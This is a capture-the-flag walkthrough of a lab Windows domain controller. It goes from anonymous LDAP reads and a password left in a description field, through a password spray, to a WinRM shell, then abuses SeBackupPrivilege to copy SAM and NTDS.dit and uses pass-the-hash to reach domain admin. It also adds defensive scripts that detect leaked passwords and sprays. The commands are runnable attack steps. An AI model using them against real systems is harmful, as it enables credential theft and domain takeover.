
👶🏼Baby

Tags: LDAP, smbpasswd, evil-winrm, SeBackupPrivilege, SAM, NTDS Extraction, pass the hash attack


HTB Baby — Detailed Solution Notes

Platform: VulnLab | Machine: Baby | OS: Windows Server 2022 | Difficulty: Easy | Vulnerability Types: LDAP Anonymous Bind, Credential in Description Field, SeBackupPrivilege Abuse, NTDS.dit Extraction


How Does a Hacker Think? — From Anonymous LDAP to Domain Admin

Baby looks like a locked door from the outside. There is no web application, no FTP share, no obvious foothold. Every attack here flows from a single overlooked detail: an IT administrator left a plaintext initial password sitting in an LDAP user description field, visible to anyone who connects anonymously. From that one credential, the chain extends through a forced password change, a Backup Operators group membership, and a shadow copy of the domain database — ending with every password hash in the domain.


1. Reconnaissance

Network Scan

nmap -p- --min-rate 5000 10.129.234.71
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 -sV -sC 10.129.234.71

The scan returns a textbook Active Directory profile. Port 53 is DNS, port 88 is Kerberos, ports 389 and 636 are LDAP and LDAPS, port 445 is SMB with signing required, port 3389 is RDP, and port 5985 is WinRM. The RDP certificate and LDAP banner both confirm the domain: baby.vl, domain controller hostname BabyDC.baby.vl, OS Windows Server 2022 build 20348. SMB signing is enabled and required, which rules out NTLM relay against this host immediately.

Hosts File

echo "10.129.234.71 baby.vl BabyDC.baby.vl" >> /etc/hosts

2. LDAP Enumeration — Anonymous Bind

How Does a Hacker Think?

When a domain controller exposes LDAP, the first question is whether anonymous binding is permitted. If it is, the entire user directory becomes readable without credentials. This is not a vulnerability in LDAP itself — it is a misconfiguration. Administrators sometimes enable it for legacy application compatibility and forget it is on. The consequence is that every user object, group membership, and description field in the domain becomes public information.

Anonymous User Enumeration

nxc ldap baby.vl -u '' -p '' --users

Nine users are returned. All are standard except Teresa.Bell, whose description field reads: Set initial password to BabyStart123!

Extended LDAP Dump

ldapsearch -x -H ldap://BabyDC.baby.vl -b "dc=baby,dc=vl" "(objectClass=*)" | grep dn

This reveals two additional users not returned by the previous query: Ian.Walker and Caroline.Robinson, in the OU=dev and OU=it organisational units respectively.

Users in scope: Jacqueline.Barnett, Ashley.Webb, Hugh.George, Leonard.Dyer, Ian.Walker, Connor.Wilkinson, Joseph.Hughes, Kerry.Wilson, Teresa.Bell, Caroline.Robinson
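As an added, defender-side illustration of the point above (this is example code, not part of the original write-up): whatever ldapsearch returns over an anonymous bind can be post-processed offline, so the same LDIF dump an attacker pulls is also the cheapest audit an administrator can run against their own directory. The script parses LDIF (folded continuation lines and base64 values included) and flags free-text attributes whose wording suggests a credential was written down. The LDIF sample is constructed for the example and modelled on the page's output; the svc.legacy account and its base64-encoded info value are invented.

```python
import base64
import re

# LDIF "attr: value" or "attr:: base64value" line
_ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")

# Free-text attributes that humans fill in by hand and that LDAP hands to any bound client
FREE_TEXT_ATTRS = ("description", "info", "comment")

# Words that usually accompany a credential written down "for later"
PASSWORD_HINT = re.compile(r"(?i)\b(pass(?:word|wd)?|pwd|credential|initial)\b")


def parse_ldif(text):
    """Parse ldapsearch LDIF output into a list of {attribute: [values]} dicts.

    Handles folded lines (a leading space continues the previous value) and
    base64 values ("attr:: ...")."""
    entries = []
    pending = []  # [attr, is_base64, raw_value] for the entry being read
    for raw in text.splitlines() + [""]:  # trailing "" flushes the last entry
        if raw.startswith("#") or raw.startswith("version:"):
            continue
        if raw == "":
            if pending:
                entry = {}
                for attr, is_b64, val in pending:
                    if is_b64:
                        val = base64.b64decode(val).decode("utf-8", "replace")
                    entry.setdefault(attr, []).append(val)
                entries.append(entry)
            pending = []
            continue
        if raw.startswith(" ") and pending:
            pending[-1][2] += raw[1:]  # folded continuation line
            continue
        m = _ATTR_LINE.match(raw)
        if m:
            pending.append([m.group(1).lower(), m.group(2) == "::", m.group(3)])
    return entries


def find_password_hints(entries):
    """Return (dn, attribute, value) for every free-text value that looks like it carries a credential."""
    hits = []
    for entry in entries:
        dn = entry.get("dn", ["<no dn>"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in entry.get(attr, []):
                if PASSWORD_HINT.search(value):
                    hits.append((dn, attr, value))
    return hits


# Constructed sample modelled on the page's ldapsearch output: Teresa.Bell's description is the one
# quoted in the write-up; svc.legacy and its base64-encoded info value are invented for the example.
_B64_INFO = base64.b64encode(b"Temporary pwd is Welcome1 - rotate after first logon").decode()
SAMPLE_LDIF = f"""# extended LDIF (constructed sample)
version: 1

dn: CN=Teresa.Bell,OU=it,DC=baby,DC=vl
sAMAccountName: Teresa.Bell
description: Set initial password to BabyStart123!

dn: CN=Ian.Walker,OU=dev,DC=baby,DC=vl
sAMAccountName: Ian.Walker
description: Developer account

dn: CN=svc.legacy,OU=constructed,DC=baby,DC=vl
sAMAccountName: svc.legacy
info:: {_B64_INFO}

dn: CN=Kerry.Wilson,DC=baby,DC=vl
sAMAccountName: Kerry.Wilson
description: Helpdesk account - see onboard
 ing checklist
"""

if __name__ == "__main__":
    for dn, attr, value in find_password_hints(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}\n  {attr}: {value}")
```

Against a real directory, redirect the page's ldapsearch command to a file and pass its contents to parse_ldif; every hit is a value that anyone able to bind (anonymously here) can read, and the fix is to move the secret out of the directory and rotate it.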


3. Credential Discovery and Password Spray

How Does a Hacker Think?

A plaintext password in a description field almost certainly belongs to an IT provisioning workflow. An administrator created multiple accounts, set the same initial password for all of them, and wrote it down in a field that was never meant to be public. The natural next step is to test that password against every account in the domain. Even if most users have already changed it, statistically at least one will not have.

Password Spray

nxc smb baby.vl -u users.txt -p 'BabyStart123!' --continue-on-success

All accounts return STATUS_LOGON_FAILURE except one. Caroline.Robinson returns STATUS_PASSWORD_MUST_CHANGE. This means the credential is valid but the account is flagged to force a password change on first login — Caroline never completed the provisioning process.
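For the defender's side of the same spray (an added example, not from the original write-up): on the domain controller each failed attempt is recorded as Security event 4625, and its Status / Sub Status fields carry the precise NTSTATUS code even though the client only sees STATUS_LOGON_FAILURE. The script works on a constructed, flattened rendering of those fields (one event per line; this is not a verbatim Windows log format). The source addresses and timestamps are invented, the account names are the ones listed on the page. It flags a source that fails against many distinct accounts inside a short window, and separately lists accounts whose failure code was STATUS_PASSWORD_MUST_CHANGE, because those are the accounts the spray actually found.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS values seen in the Status / Sub Status fields of Security event 4625
NTSTATUS = {
    0xC000006D: "STATUS_LOGON_FAILURE (generic: bad user name or password)",
    0xC000006A: "STATUS_WRONG_PASSWORD",
    0xC0000064: "STATUS_NO_SUCH_USER",
    0xC0000072: "STATUS_ACCOUNT_DISABLED",
    0xC0000234: "STATUS_ACCOUNT_LOCKED_OUT",
    0xC0000224: "STATUS_PASSWORD_MUST_CHANGE (password was correct, change required)",
}
MUST_CHANGE = 0xC0000224

# Constructed, flattened form of the 4625 fields a SIEM would ship; not a verbatim Windows log line
_EVENT = re.compile(
    r"^(?P<time>\S+) EventID=(?P<id>\d+) IpAddress=(?P<src>\S+) "
    r"TargetUserName=(?P<user>\S+) Status=(?P<status>0x[0-9A-Fa-f]+) SubStatus=(?P<sub>0x[0-9A-Fa-f]+)$"
)


def parse_event(line):
    m = _EVENT.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    return {
        "time": datetime.strptime(m["time"], "%Y-%m-%dT%H:%M:%SZ"),
        "id": int(m["id"]),
        "src": m["src"],
        "user": m["user"],
        "status": int(m["status"], 16),
        "sub": int(m["sub"], 16),
    }


def detect_spray(lines, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: sorted distinct accounts} for every source that failed logons
    for at least min_accounts different accounts inside one sliding window."""
    failures = defaultdict(list)
    for e in sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["time"]):
        if e["id"] == 4625:
            failures[e["src"]].append(e)
    alerts = {}
    for src, evs in failures.items():
        best, start = set(), 0
        for i, e in enumerate(evs):
            while e["time"] - evs[start]["time"] > window:
                start += 1  # slide the window forward
            users = {x["user"].lower() for x in evs[start:i + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_accounts:
            alerts[src] = sorted(best)
    return alerts


def valid_but_must_change(lines):
    """Accounts whose failure carried STATUS_PASSWORD_MUST_CHANGE: the supplied password was right."""
    return sorted({e["user"] for e in map(parse_event, (l for l in lines if l.strip()))
                   if MUST_CHANGE in (e["status"], e["sub"])})


def describe(code):
    return NTSTATUS.get(code, f"0x{code:08X}")


# Constructed sample: one spray over the ten accounts from the write-up from one invented source,
# plus a single unrelated failure from another invented address.
SAMPLE_EVENTS = """
2025-01-15T09:12:01Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Jacqueline.Barnett Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:02Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Ashley.Webb Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:03Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Hugh.George Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:04Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Leonard.Dyer Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:05Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Ian.Walker Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:06Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Connor.Wilkinson Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:07Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Joseph.Hughes Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:08Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Kerry.Wilson Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:09Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Teresa.Bell Status=0xC000006D SubStatus=0xC000006A
2025-01-15T09:12:10Z EventID=4625 IpAddress=10.10.14.5 TargetUserName=Caroline.Robinson Status=0xC0000224 SubStatus=0x0
2025-01-15T09:30:00Z EventID=4625 IpAddress=10.10.20.7 TargetUserName=Hugh.George Status=0xC000006D SubStatus=0xC000006A
"""

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS.splitlines()).items():
        print(f"spray from {src}: {len(users)} accounts")
    for user in valid_but_must_change(SAMPLE_EVENTS.splitlines()):
        print(f"valid password found for {user}: {describe(MUST_CHANGE)}")
```

The distinct-account count per source is what separates a spray from a user mistyping one password; the must-change list is worth alerting on by itself, since an account that has never completed provisioning but just accepted its password is exactly the one an attacker will take over next.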

Forced Password Change

smbpasswd -r 10.129.234.71 -U Caroline.Robinson

Old password: BabyStart123!
New password: Password123!

Credentials obtained: Caroline.Robinson : Password123!


4. Initial Foothold — WinRM Shell

evil-winrm -i baby.vl -u Caroline.Robinson -p 'Password123!'

A shell opens immediately. WinRM was exposed on port 5985 and Caroline.Robinson has the necessary remote management rights.

User flag obtained: C:\Users\Caroline.Robinson\Desktop\user.txt


5. Privilege Enumeration — SeBackupPrivilege

How Does a Hacker Think?

The first command after obtaining a shell is always whoami /priv. Privilege tokens determine what the current account can do beyond standard user operations. SeBackupPrivilege is deceptively named — it sounds like it only allows creating backups, but its actual effect is that, for a process that opens files with backup semantics, it bypasses the access control checks on file read operations. Any file on the system, regardless of ACL permissions, can be read that way by a process holding this privilege. This includes the SAM hive, the SYSTEM hive, and critically, the NTDS.dit Active Directory database.

whoami /priv

The output confirms SeBackupPrivilege and SeRestorePrivilege are both enabled. Caroline.Robinson is a member of the Backup Operators group.


6. SAM and SYSTEM Hive Extraction

The SAM hive contains NTLM hashes for all local accounts. The SYSTEM hive contains the boot key required to decrypt the SAM hive. Neither can be read directly through normal means, but SeBackupPrivilege bypasses that restriction entirely.

reg save HKLM\SAM .\SAM
reg save HKLM\SYSTEM .\SYSTEM
download SAM
download SYSTEM
impacket-secretsdump -sam /home/kali/SAM -system /home/kali/SYSTEM LOCAL

The local Administrator hash is extracted: 8d992faed38128ae85e95fa35868bb43. However, attempting to use this hash for WinRM authentication fails. This is the hash of the built-in local Administrator account held in the SAM, not the domain Administrator hash. The domain credentials are stored in NTDS.dit, not in the SAM hive.


7. NTDS.dit Extraction — Volume Shadow Copy

How Does a Hacker Think?

NTDS.dit is the Active Directory database. It contains the credentials for every domain user. The file is always locked by the LSASS process while the domain controller is running, which means it cannot be copied directly. The standard technique is to create a Volume Shadow Copy — a point-in-time snapshot of the drive — and read NTDS.dit from the snapshot, where it is not locked. SeBackupPrivilege gives the necessary access to copy the file out of the shadow copy once it is mounted.

Shadow Copy Creation via Diskshadow

A script file is created on the attack machine and uploaded to the target. The script must use Windows line endings to be parsed correctly by diskshadow.

cat > /home/kali/backup.txt << 'EOF'
set verbose on
set metadata C:\Windows\Temp\test.cab
set context persistent
add volume C: alias cdrive
create
expose %cdrive% E:
EOF
unix2dos /home/kali/backup.txt
upload /home/kali/backup.txt backup.txt
diskshadow /s .\backup.txt

The shadow copy is created and exposed as drive E:.

NTDS.dit Copy

robocopy /b E:\Windows\NTDS . ntds.dit
download ntds.dit

The /b flag instructs robocopy to use backup semantics, which invokes SeBackupPrivilege to bypass the ACL on the file.


8. Domain Hash Extraction and Domain Admin Access

impacket-secretsdump -ntds /home/kali/ntds.dit -system /home/kali/SYSTEM LOCAL

All domain credential hashes are decrypted. The domain Administrator NTLM hash is: ee4457ae59f1e3fbd764e33d9cef123d

Pass-the-Hash

evil-winrm -i baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

The shell opens as domain Administrator.

Root flag obtained: C:\Users\Administrator\Desktop\root.txt


Core Techniques Used

Anonymous LDAP enumeration exposed the entire user directory without any credentials. Description fields in Active Directory are intended for internal documentation but are readable by any authenticated — or in this case, anonymous — connection to LDAP. A single careless note left by an administrator during account provisioning became the entry point for the entire chain.

Password spraying tested the discovered initial password against all domain users simultaneously. The key constraint is lockout policy — spraying too aggressively locks accounts. A single password across all users is a safe starting point. The STATUS_PASSWORD_MUST_CHANGE response distinguished Caroline.Robinson from the rest and indicated a valid but unconfigured account.

SeBackupPrivilege abuse exploited a privilege that is routinely granted to Backup Operators without full consideration of its implications. The privilege was designed to allow backup software to read any file regardless of permissions. In a security context, it means any member of Backup Operators can read the SAM hive, the SYSTEM hive, and with a shadow copy, the NTDS.dit database.

Volume Shadow Copy via diskshadow bypassed the NTDS.dit file lock. The Active Directory database cannot be copied while the domain controller is running because LSASS holds an exclusive lock on it. Creating a shadow copy produces a frozen snapshot of the drive at that moment — the snapshot's copy of NTDS.dit is not locked by any process and can be read freely.

Pass-the-Hash completed the privilege escalation. The domain Administrator NTLM hash extracted from NTDS.dit was used directly for WinRM authentication without needing to crack the underlying password. NTLM authentication accepts the hash itself as proof of identity.


General Hacker Mindset Summary

Description fields are a data source, not decoration. Any field in Active Directory that a human fills in manually is worth reading. Administrators document things in the closest available text box, and LDAP exposes all of it to anyone who can bind to the directory.

STATUS_PASSWORD_MUST_CHANGE is a green light. When a spray returns this status instead of a logon failure, the credential is correct. The account simply has not been activated yet. Changing the password through a protocol that accepts the old one is trivial and leaves no more noise than a legitimate first login.

Backup Operators is effectively Domain Admin in disguise. Any group membership that grants SeBackupPrivilege on a domain controller should be treated as a path to full domain compromise. The privilege was designed for tape backup software, not for human users — its presence on an interactive account almost always reflects a configuration mistake.

The local SAM and the domain NTDS.dit are different targets. Extracting the local Administrator hash from the SAM hive is useful for lateral movement to other machines that share that password, but it does not grant domain access. Domain credentials live exclusively in NTDS.dit on the domain controller. Understanding the distinction prevents wasted time trying to reuse a local hash against domain services.


Key Topics

You can use these as subheadings: